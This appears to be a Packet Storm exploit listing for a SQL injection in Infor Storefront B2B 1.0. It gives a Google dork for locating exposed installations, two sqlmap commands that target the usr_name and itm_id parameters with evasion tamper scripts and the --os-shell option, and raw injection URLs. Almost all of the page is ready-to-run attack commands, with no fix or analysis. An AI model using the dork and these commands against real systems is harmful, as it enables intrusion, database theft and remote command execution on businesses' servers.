Infor Storefront B2B version 1.0 suffers from a remote SQL injection vulnerability.
8ad132169f2b0a6a955fff172d747fb660e8cae33a1dce0253e90b9bbc844dbb# Exploit Title: Infor Storefront B2B 1.0 - 'usr_name' SQL Injection
# Google Dork: inurl:storefrontb2bweb
# Date: 2020-06-27
# Exploit Author: ratboy
# Vendor Homepage: https://www.insitesoft.com/infor-storefront/
# Version: Infor Storefront
# Tested on: Windows All Versions
[POC Multiple Vulns]
python sqlmap.py -u
"http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass"
-p usr_name --dbms=mssql --level=5 --risk=3
--tamper=between,space2comment -o --random-agent --parse-errors
--os-shell --technique=ES
python sqlmap.py -u
"http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1"
-p itm_id --dbms=mssql --level=5 --risk=3
--tamper=between,space2comment -o --random-agent --parse-errors
--os-shell --technique=ES
or...
http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass'[SQL
INJECTION];--
http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1'[SQL
INJECTION];--
--
Sincerly,
Aaron Schrom
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed